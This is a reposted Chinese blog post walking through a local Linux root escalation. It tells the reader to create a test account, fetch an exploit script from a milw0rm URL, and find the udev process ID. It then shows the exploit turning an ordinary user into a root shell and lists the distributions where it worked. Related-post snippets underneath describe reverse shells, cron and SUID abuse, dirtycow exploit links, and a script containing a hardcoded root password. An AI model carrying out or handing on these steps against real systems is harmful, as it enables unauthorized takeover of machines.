LINUX 普通用户提权ROOT (完整版)SHELL版首发!!!

最新推荐文章于 2025-07-02 09:10:01 发布
转载 最新推荐文章于 2025-07-02 09:10:01 发布 · 1.1w 阅读 · 0
文章标签:

#linux #shell #function #测试 #脚本 #x86

本文介绍了一种在Linux系统中从普通用户提升到root权限的方法,包括创建test账户、下载并使用特定脚本来获取UDEV的PID,最终实现权限提升。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1. 在LINUX目录下建立test 帐户
2.下载 a脚本 在http://milw0rm.com/exploits/8478
3.查看UDEV的PID  方法一: 先cat /proc/net/netlink
ffff810077587400 15  364    ffffffff 0        0        0000000000000000 2
ffff810037f81000 16  0      00000000 0        0        0000000000000000 2
ffff810077078400 18  0      00000000 0        0        0000000000000000 2
那个364就是 UDEV的进程,如果出现很多不知道哪一个用方法2
方法二:
另外最好通过ps aux | grep udev获取pid 为365,然后再-1,把这个参数传给A脚本
然后在test 用户的当前目录 里
按以下步骤运行
[haha@localhost ~]$ id
uid=501(haha) gid=502(haha) groups=502(haha)
[haha@localhost ~]$sh a 364
suid.c: In function 'main':
suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
sh-3.1# id
uid=0(root) gid=0(root) groups=502(haha)
此时的UID 变为0了 ,test用户已经变为 ROOT用户 可以继续以下
sh-3.1# bash
[root@localhost ~]#
看!test -> ROOT 用户大变身!!

说说我的测试版本[root@localhost ~]# uname -a
Linux localhost.localdomain 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:14 EST 2007 x86_64 x86_64 x86_64 GNU/Linux

目前RH5 和UBANTU 以及DABIAN都测试通过了 但是TURBOLINUX上没有测试通过..

linux——大赏
qq_55202378的博客
04-20 1668
我的理解是:靶机的shell标准输入、输出、错误输出都与127.0.0.1:4444的输出建立了TCP连接,也就是说靶机shell所有的输出信息都会显示到监听127.0.0.1:4444的shell中,唯独没有解决从127.0.0.1:4444向靶机发送命令。文件中,每个用户的密码都是用一个特定的哈希函数加密的。查看当前系统的自动任务后,一方面可以定位定时脚本的位置,然后将shell写到定时脚本中,实现;时本来就是root限,预先加载共享库shell.so时,也是以root用户的限去加载的。
升:利用Linux错配
qq_68163788的博客
02-14 1813
Linux系统中,错误的配置可能导致漏洞,使攻击者能够获取比其本来限更高的限。这种错误配置可能涉及文件限、用户组设置、sudo配置等。 一种常见的错误配置漏洞是在文件限设置上。如果系统中的某个文件被设置为具有过高的限,例如普通用户可以执行的文件被设置为具有root限,攻击者可以利用这个漏洞来执行恶意代码并获取更高的限。 另一种错误配置漏洞是在用户组设置上。如果某个用户组被错误地配置为具有root限,攻击者可以将自己添加到这个用户组中,从而获取更高的限。
linux 普通用户root.docx
06-04
渗透中如何将Linux普通用户root,首先创建一个普通用户,并且给普通用户设置一个密码,保证能用su 命令能用普通用户
linux如何给普通用户,Linux普通用户root
weixin_33459498的博客
05-01 447
[root@ns ~]# whoami ##我是谁root[root@ns ~]# useradd putong[root@ns ~]# su - putong[putong@ns ~]$ whoamiputong[putong@ns ~]$ ll -d /tmp/drwxrwxrwt. 3 root root 4096 12月2 03:11 /tmp/[putong@ns ~]$ cd /t...
紧急预警!Linux Sudo 曝高危漏洞,数亿服务器面临 “一键” 风险
最新发布
easylife206的专栏
07-02 2091
Stratascale网络研究部门(CRU)发布的最新安全公告显示,Sudo中存在CVE-2025-32463和CVE-2025-32462。CRU表示:"该漏洞使sudoers规则中的主机名部分失效,因为用户可以在评估规则时自行设置要使用的主机"。stratascale在公告中表示:"攻击者可利用sudo的-R(--chroot)选项以root身份执行任意命令,即使这些命令未列在。这些潜伏在全球最受信任的命令工具中的缺陷,能让攻击者绕过配置保护措施,即使被明确拒绝访问也能将升至root
linux 普通用户root
vippomelo的博客
09-28 1084
Linux之SUID 本篇文章非原创,用作笔记方便后期查询,原创作者微信公众号“黑白之道”如有侵,联系删除 什么是suid? 通俗的理解为其他用户执行这个程序的时候可以用该程序所有者/组的限。 常见的可用于suid的命令 Vim find Bash More Less cp chmod ash/linux shell awk mv man python perl tcpdump 查找suid文件 1 2 ...
linux下添加用户并赋予root
12-16
linux下添加用户并赋予root
Linux曝出Sudo漏洞 任意用户亦可运行root命令
09-14
近期曝出的一个漏洞,却直指 sudo 的一个安全策略隐患 —— 即便配置中明确不允许 root 用户访问,该漏洞仍可允许恶意用户或程序,在目标 Linux 系统上以 root 用户身份执行任意命令
linux禁止普通用户切换至root用户的实例讲解
09-15
本文将详细介绍如何在Linux中禁止普通用户切换至root用户,通过控制限访问模块(PAM)和登录定义文件来实现这一目标。 首先,让我们回顾一下Linux中的用户和用户组管理命令: 1. **添加用户**:使用`useradd`...
Linux
qq_46258964的博客
01-07 1万+
Linux Linux一般把脚本放置在/tmp目录下,临时文化,可读写执行。 有本地用户就本地,没有就msfLinux自动化脚本利用工具 信息收集工具:LinEnum, linuxprivchecker 漏洞收集工具:linux-exploit-suggester linux-exploit-suggester2 方式如下 1,Linux SUID suid可以让调用者以文件拥有者的身份运行该文件, 所以我们就利用suid的思路就是运行root用户所拥有的suid文件
Linux基础
2301_77004573的博客
11-08 393
( backup.sh 脚本有定义完整的路径),cron 将引用 /etc/crontab 文件中的 PATH 变量下列出的路径;在这种情况下,我们可以尝试在用户的主文件夹(home)下创建一个名为“antivirus.sh”的脚本,然后让它作为 cron 任务运行。最终传入的反向 shell 连接能够帮助我们成功获取 root 限。一旦你发现现有的脚本或任务被附加到cron jobs,那么就值得花时间去了解相关脚本的功能以及如何在上下文中使用工具对cron jobs进行利用。
shell脚本中使用root
我的blog屋
11-06 1万+
方法一:使用expect 参考博客:https://www.cnblogs.com/linuxAndMcu/p/11127787.html#_label1 #!/usr/expect/bin/expect -f set timeout=5 #设置5秒超时 #下面几行后面不能添加注释,否则会异常 #send "exit\r" - exit命令:会退出root账号,成为普通用户 spawn su - root expect "密码:" send "zlkj\r" send "pwd\r" #send "exi
Shell脚本切换root用户或获取root
热门推荐
大话家的博客
03-10 2万+
前言 需求:Shell脚本不能通过root用户执行,只能通过普通用户执行。但是脚本中的某些命令需要时root限。 想法:在执行需要root限的命令时切换到root用户 或者 拿到root限。 切换root用户 1、安装expect yum install -y expect 2、编写脚本 (3条消息) 解决linux下sudo更改文件限报错xxxis not in the sudoers file. This incident will be reported._心之所向,一如既
惊爆!!!一条命令,瞬间让普通用户root,赶紧修复!
笨办法学linux的博客
08-25 1587
该漏洞非常容易利用,允许任何未经授的用户通过在其默认配置中利用此漏洞,来获得易受攻击主机上的完全root限。
android shell su root
weixin_40455343的博客
08-28 594
Android ShellRoot限 在Android操作系统中,"shell"是指系统的命令行界面,而"su"命令则用于切换到超级用户(root)身份。具备root限后,用户能够访问和修改系统文件、安装未授的应用、以及执行许多普通用户无法操作的任务。这使得开发者和高级用户能够完全掌控设备。 一、什么是Root限...
root用户给普通用户,禁止root远程登录
weixin_53150440的博客
10-16 1958
root用户给普通用户,禁止root远程登录
Linux
qq_46527080的博客
02-25 966
Linux1.脏牛漏洞2.sudo-- CVE-2019-142873.Linux配置错误4.内核2.6本地5.suid 1.脏牛漏洞 漏洞范围:Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复) exp: https://github.com/gbonacini/CVE-2016-5195 https://github.com/FireFart/dirtycow 实验环境是在bee-bug靶场中进行 首先我们进入这个bee-bug靶场 然
基于Linux下的root骚操作
帅醉了的博客
01-30 5739
0x00_前言 小小博客,大大梦想。 博主还是小白,总结几个有关于在入侵靶机后,如何在Linux下的关于普通用户root下的操作,如有错误或其他请多多包含,希望出多交流。 0x01_操作简介 的三个骚操作: 内核溢出 明文密文解密 计划任何进程 密码复用 加粗样式 ...
获取root限及破解原理分析
weixin_34034261的博客
06-05 444
  2012-03-18 17:58:45|  分类: android |字号 订阅 如今Android系统的root破解基本上成为大家的必备技能!网上也有非常多中一键破解的软件,使root破解越来越easy。可是你思考过root破解的原理吗?root破解的本质是什么呢?难道是利用了Linux kernal的漏洞吗?本文将简单对root...
linux下从root切回普通用户
06-21
我们正在处理用户的问题:如何从root用户切换回普通用户?根据引用内容,我们注意到引用[1]到了一些关于su和sudo命令的信息,特别是:-默认情况下,某些Linux发行(如Ubuntu)禁用了root账户,但可以通过`sudosu...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值